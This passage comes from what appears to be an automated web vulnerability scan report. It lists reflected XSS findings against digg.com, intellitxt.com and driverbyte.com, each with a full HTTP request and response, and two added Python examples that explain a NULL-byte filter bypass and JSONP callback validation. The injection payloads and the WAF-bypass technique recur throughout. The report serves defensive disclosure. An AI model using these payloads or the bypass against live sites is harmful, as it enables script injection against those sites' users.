<form class="contact" action="/weblog/2006/03/base/?8af36\"><script>alert(1)</script>770fc1d9d40=1#preview" method="post">
...[SNIP]...

4.34. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009da6c"><script>alert(1)</script>d18492e2c89 was submitted in the REST URL parameter 1. This input was echoed as 9da6c"><script>alert(1)</script>d18492e2c89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%009da6c"><script>alert(1)</script>d18492e2c89 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 16:01:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1168415921484595456%3A180; expires=Mon, 07-Feb-2011 16:01:22 GMT; path=/; domain=digg.com
Set-Cookie: d=3e0917fe7fe8fd0acf4c1eeedf77ce194c85aeb0dd072779f425315961ae5aeb; expires=Sat, 06-Feb-2021 02:09:02 GMT; path=/; domain=.digg.com
X-Digg-Time: D=209054 10.2.129.90
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15618

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%009da6c"><script>alert(1)</script>d18492e2c89.rss">
...[SNIP]...
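Added example for the NULL-byte bypass reported in 4.30, 4.31 and 4.34 above; this is not code from the report, from any WAF product, or from the sites involved. It emulates a filter written in native code by reading the URL-decoded path through a C `char *` (via ctypes), so everything after the first NUL is invisible to the signature check, while the application, which runs on a length-counted string runtime and echoes the raw path as the responses above show, still emits the `<script>` tag. The blocked-signature list, the fixed filter and the simplified reflection are assumptions.

```python
import ctypes
from urllib.parse import unquote_to_bytes

# Request path exactly as submitted in 4.31 (constructed from the request above).
PATH = '/weblog%005d974"><script>alert(1)</script>c01828428ea/2006/03/base/'

# Signatures an assumed signature-based filter looks for (illustrative list).
BLOCKED = (b'<script', b'javascript:', b'onerror=')


def native_string_view(raw_path):
    """What a filter written in C sees when it URL-decodes the path into a
    buffer and then handles it as a NUL-terminated string.  ctypes.c_char_p
    reads the buffer exactly as strlen()/strstr() would: up to the first \\x00."""
    decoded = unquote_to_bytes(raw_path)
    return ctypes.c_char_p(decoded).value


def naive_filter_blocks(raw_path):
    """Signature match over the truncated view.  This is the bypass."""
    view = native_string_view(raw_path).lower()
    return any(sig in view for sig in BLOCKED)


def fixed_filter_blocks(raw_path):
    """Length-aware check: inspect every decoded byte, and treat an embedded
    NUL as hostile in its own right, since no legitimate path contains one."""
    decoded = unquote_to_bytes(raw_path)
    if b'\x00' in decoded:
        return True
    return any(sig in decoded.lower() for sig in BLOCKED)


def application_reflects(raw_path):
    """The application (PHP here, per X-Powered-By) uses length-counted strings
    and, as the response shows, writes the raw request path into an href,
    NUL and all.  Simplified to one anchor tag."""
    return '<a href="%s">' % raw_path


if __name__ == '__main__':
    print('filter sees      :', native_string_view(PATH))
    print('naive filter     :', 'blocked' if naive_filter_blocks(PATH) else 'PASSED')
    print('fixed filter     :', 'blocked' if fixed_filter_blocks(PATH) else 'PASSED')
    print('application emits:', application_reflects(PATH))
```

The check that matters is the second one: rejecting any decoded NUL up front removes the whole class, independent of which signatures the filter carries, and it costs nothing because a NUL never belongs in a URL path. The real fix remains output encoding in the application; the filter is only a second line.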

4.35. http://download32.us.intellitxt.com/al.asp [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://download32.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c219f%3balert(1)//7aec04d590a was submitted in the jscallback parameter. This input was echoed as c219f;alert(1)//7aec04d590a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20110205214821&adid=126828%2C0%2C3841%2C121057%2C0%2C0%2C0&cc=us&di=29848192%2C29951564%2C29471372%2C29167950%2C30018856%2C29875388%2C29651480&hk=1&ipid=18400&mh=57f4673cf4ad79544ac753cf0dd004c8&pid=2%2C2%2C2%2C2%2C2%2C2%2C2&pvm=8cc57e88ff824e9e3d4bdb25eca56ba9&pvu=4E02CE94902A497D8EBF5C1016534811&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0%2C0&kp=430%2C971%3B168%2C1189%3B238%2C1238%3B337%2C1717%3B479%2C2214%3B509%2C2742%3B346%2C4628%3B&prf=ll%3A2635%7Cintl%3A2738%7Cpreprochrome%3A2%7Cgetconchrome%3A251%7Ccontint%3A3224%7Ccontl%3A6220%7Cadvint%3A351%7Cadvl%3A6571%7Ctl%3A6773&jscallback=$iTXT.js.callback19c219f%3balert(1)//7aec04d590a HTTP/1.1
Host: download32.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.download32.com/nslookup-software.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 22:24:31 GMT; Path=/
Content-Type: text/javascript
Content-Length: 66
Date: Sat, 05 Feb 2011 22:24:31 GMT
Connection: close

try{$iTXT.js.callback19c219f;alert(1)//7aec04d590a();}catch(e){}
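The response above is the classic JSONP pattern: the callback name is pasted into code, so a `;` turns the remainder of the parameter into a statement of the attacker's choosing. Added example, not the report's text or the intellitxt service's code: the callback is accepted only if it is a dotted chain of JavaScript identifiers under a length cap, otherwise the request gets a 400; a valid response carries an explicit script content type, a nosniff header and a leading comment so it cannot be re-interpreted as something else. The identifier grammar, the length limit and the response shape are assumptions.

```python
import re

# Callback name the page itself sends, and the 4.35 payload with %3b decoded
# (both constructed from the request above).
DEFAULT_CALLBACK = '$iTXT.js.callback19'
PAYLOAD = '$iTXT.js.callback19c219f;alert(1)//7aec04d590a'

# A JSONP callback may only ever be a dotted chain of JS identifiers.
# re.ASCII keeps \w-style classes from admitting Unicode letters.
CALLBACK_RE = re.compile(
    r'[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*', re.ASCII)
MAX_CALLBACK_LEN = 64  # assumed cap; generous for real callback names


def is_valid_callback(name):
    return len(name) <= MAX_CALLBACK_LEN and CALLBACK_RE.fullmatch(name) is not None


def render_vulnerable(callback):
    """What al.asp does, per the response above: the parameter is pasted into code."""
    return 'try{%s();}catch(e){}' % callback


def jsonp_response(callback):
    """Return (status, headers, body).

    An invalid callback is a hard 400 rather than a silent fallback, so a probe
    like the scanner's is visible in the logs.  The leading comment and the
    nosniff header stop the body from being sniffed or replayed as a different
    content type (the defence against Rosetta-Flash-style abuse)."""
    if not is_valid_callback(callback):
        return 400, {'Content-Type': 'text/plain; charset=utf-8'}, 'invalid callback'
    headers = {
        'Content-Type': 'application/javascript; charset=utf-8',
        'X-Content-Type-Options': 'nosniff',
    }
    return 200, headers, '/**/try{%s();}catch(e){}' % callback


if __name__ == '__main__':
    print('vulnerable :', render_vulnerable(PAYLOAD))
    print('hardened   :', jsonp_response(PAYLOAD)[:1], jsonp_response(PAYLOAD)[2])
    print('legitimate :', jsonp_response(DEFAULT_CALLBACK)[2])
```

Validation rather than encoding is the right tool here because the value is used as code, not as data: there is no encoder that turns an arbitrary string into a safe JavaScript expression, only a grammar that says which strings are allowed in the first place.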

4.36. http://download32.us.intellitxt.com/iframescript.jsp [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://download32.us.intellitxt.com
Path:   /iframescript.jsp

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f646d"><script>alert(1)</script>a066d7a2f43 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2770%2C2765%2C2794%2C2792%2C2795%2C2763%2C2764%26type%3Dscript%26ipid%3D18400%26sfid%3D0f646d"><script>alert(1)</script>a066d7a2f43 HTTP/1.1
Host: download32.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.download32.com/nslookup-software.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Type: text/html
Content-Length: 225
Date: Sat, 05 Feb 2011 22:24:19 GMT
Connection: close

<html><body><script src="http://pixel.intellitxt.com/pixel.jsp?id=2773,2770,2765,2794,2792,2795,2763,2764&type=script&ipid=18400&sfid=0f646d"><script>alert(1)</script>a066d7a2f43" language="javascript">
...[SNIP]...

4.37. http://download32.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://download32.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24d8b'-alert(1)-'5f3e446269e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=18400&24d8b'-alert(1)-'5f3e446269e=1 HTTP/1.1
Host: download32.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.download32.com/nslookup-software.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AIAAAEt7DS2iwA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt9+zoqAA-; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 22:24:14 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt9+zoqAA-; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 22:24:14 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 22:24:14 GMT
Connection: close
Content-Length: 10714

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
;_qoptions={tags:"721.8541.18400"};_qacct="p-fdwEfW0hIeH9U";$iTXT.js.load("http://edge.quantserve.com/quant.js");$iTXT.js.serverUrl='http://download32.us.intellitxt.com';$iTXT.js.pageQuery='ipid=18400&24d8b'-alert(1)-'5f3e446269e=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

4.38. http://download32.us.intellitxt.com/v4/advert [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://download32.us.intellitxt.com
Path:   /v4/advert

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 11ac3%3balert(1)//b19114a24fd was submitted in the jscallback parameter. This input was echoed as 11ac3;alert(1)//b19114a24fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/advert?ts=1296942500943&refurl=http%3A%2F%2Fwww.download32.com%2Fnslookup-software.html&sid=57f4673cf4ad79544ac753cf0dd004c8&pvu=4E02CE94902A497D8EBF5C1016534811&pvm=8cc57e88ff824e9e3d4bdb25eca56ba9&ipid=18400&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&dat=12%2C6%2C18&jscallback=$iTXT.js.callback1811ac3%3balert(1)//b19114a24fd HTTP/1.1
Host: download32.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.download32.com/nslookup-software.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 22:24:31 GMT
Connection: close
Content-Length: 13687

(function(){var nh = new $iTXT.ui.Hook({value: "windows xp",uid: "4CE10DDD0B464E3594F4EBCDDB622BF1",uidh: "b33b1a94dd4778a9dbf40e8a55fbd665",advert: (function(){var ad = new $iTXT.data.Advert('$iTXT.t
...[SNIP]...
track.hook'));$iTXT.glob.track.hook.push(new $iTXT.data.Pixel(19828494,'windows vista','http://pixel.intellitxt.com/pixel.jsp?id=2794&type=script',true,'$iTXT.glob.track.hook'));try{$iTXT.js.callback1811ac3;alert(1)//b19114a24fd();}catch(e){}

4.39. http://download32.us.intellitxt.com/v4/context [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://download32.us.intellitxt.com
Path:   /v4/context

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload be98b%3balert(1)//513baa1609f was submitted in the jscallback parameter. This input was echoed as be98b;alert(1)//513baa1609f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/context?ts=1296942497719&refurl=http%3A%2F%2Fwww.download32.com%2Fnslookup-software.html&sid=57f4673cf4ad79544ac753cf0dd004c8&pvu=4E02CE94902A497D8EBF5C1016534811&pvm=8cc57e88ff824e9e3d4bdb25eca56ba9&ipid=18400&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&dat=12%2C6%2C18&pagecl=16914&jsoncl=16099&ppc=-1&hn=96&chunkkey=18400:57f4673cf4ad79544ac753cf0dd004c8:4CD59B7A613C41A19879C8AC98480C80:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A1%2Cc%3A%22Interactive%20DNS%20Query%20is%20a%20program%20designed%20to%20allow%20you%20to%20perform%20a%20query%20of%20DNS%20records.%20It%20is%20similar%20to%20the%20unix%20%5C%22dig%5C%22%20or%20%5C%22nslookup%5C%22%20commands%2C%20and%20uses%20a%20convenient%20GUI%20interface.%20Interactive%20DNS%20Query%20allows%20you%20to%20query%20for%20all%20types%20of%20DNS%20records%2C%20including%20A%2C%20MX%2C%20TXT%2C%20NS%2C%20etc.%22%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A2%2Cc%3A%22522.0%20KB%22%7D%2C%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A3%2Cc%3A%22Freeware%22%7D%2C%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A4%2Cc%3A%22Windows%2095%2C%20Windows%2098%2C%20Windows%20Me%2C%20Windows%20NT%2C%20Windows%20XP%2C%20Windows%202000%22%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A5%2Cc%3A%22The%20kick'n%20TCP%2FIP%20diagnostic%20toolkit%20-%20cool%20tools%20for%20network%20troubleshooting.%20Includes%20GeoRoute%20(a%20geographical%20trace%20route%20displayed%20on%20a%20world%20map)%2C%20iSpeed%20(an%20Internet%20speed%20tester%20whic&chunk=0&total=17&jscallback=$iTXT.js.callback1be98b%3balert(1)//513baa1609f HTTP/1.1
Host: download32.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.download32.com/nslookup-software.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Content-Length: 63
Date: Sat, 05 Feb 2011 22:24:25 GMT
Connection: close

try{$iTXT.js.callback1be98b;alert(1)//513baa1609f();}catch(e){}

4.40. http://download32.us.intellitxt.com/v4/init [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://download32.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bd0eb%3balert(1)//fa6a87ef4aa was submitted in the jscallback parameter. This input was echoed as bd0eb;alert(1)//fa6a87ef4aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1296942497358&pagecl=16914&fv=10&muid=&refurl=http%3A%2F%2Fwww.download32.com%2Fnslookup-software.html&ipid=18400&jscallback=$iTXT.js.callback0bd0eb%3balert(1)//fa6a87ef4aa HTTP/1.1
Host: download32.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.download32.com/nslookup-software.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 22:24:21 GMT
Connection: close
Content-Length: 19890

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback0bd0eb;alert(1)//fa6a87ef4aa({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

4.41. http://download32.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://download32.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f4db"-alert(1)-"99b36b51f6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1296942497358&pagecl=16914&fv=10&muid=&refurl=http%3A%2F%2Fwww.download32.com%2Fnslookup-software.html&ipid=18400&jscallback=$iTXT.js.callback0&7f4db"-alert(1)-"99b36b51f6a=1 HTTP/1.1
Host: download32.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.download32.com/nslookup-software.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 22:24:23 GMT
Connection: close
Content-Length: 19871

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
ozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13","REGIONNAME":"Texas","muid":"","city":"Dallas","jscallback":"$iTXT.js.callback0","7f4db"-alert(1)-"99b36b51f6a":"1","reg":"tx","refurl":"http://www.download32.com/nslookup-software.html","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iTXT.glob.params=new
...[SNIP]...

4.42. http://driverbyte.com/download-ga-81845gv-gigabyte-vga-driver_freedownload [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://driverbyte.com
Path:   /download-ga-81845gv-gigabyte-vga-driver_freedownload

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2f79e<img%20src%3da%20onerror%3dalert(1)>26b55a1d1b2 was submitted in the REST URL parameter 1. This input was echoed as 2f79e<img src=a onerror=alert(1)>26b55a1d1b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /download-ga-81845gv-gigabyte-vga-driver_freedownload2f79e<img%20src%3da%20onerror%3dalert(1)>26b55a1d1b2 HTTP/1.1
Host: driverbyte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 21:46:58 GMT
Content-Type: text/html
Connection: close
Last-Modified: Sat, 05 Feb 2011 21:46:58 GMT
Expires: Sun, 27 Jul 1997 05:00:00 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: rngine/2.x optimized/cached
Content-Length: 19348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download ga 81845
...[SNIP]...
<b>download ga 81845gv gigabyte vga driver2f79e<img src=a onerror=alert(1)>26b55a1d1b2</b>
...[SNIP]...

4.43. http://driverbyte.com/download-ga-81845gv-gigabyte-vga-driver_freedownload [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://driverbyte.com
Path:   /download-ga-81845gv-gigabyte-vga-driver_freedownload

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72968"><img%20src%3da%20onerror%3dalert(1)>a36cb148e37 was submitted in the REST URL parameter 1. This input was echoed as 72968\"><img src=a onerror=alert(1)>a36cb148e37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /download-ga-81845gv-gigabyte-vga-driver_freedownload72968"><img%20src%3da%20onerror%3dalert(1)>a36cb148e37 HTTP/1.1
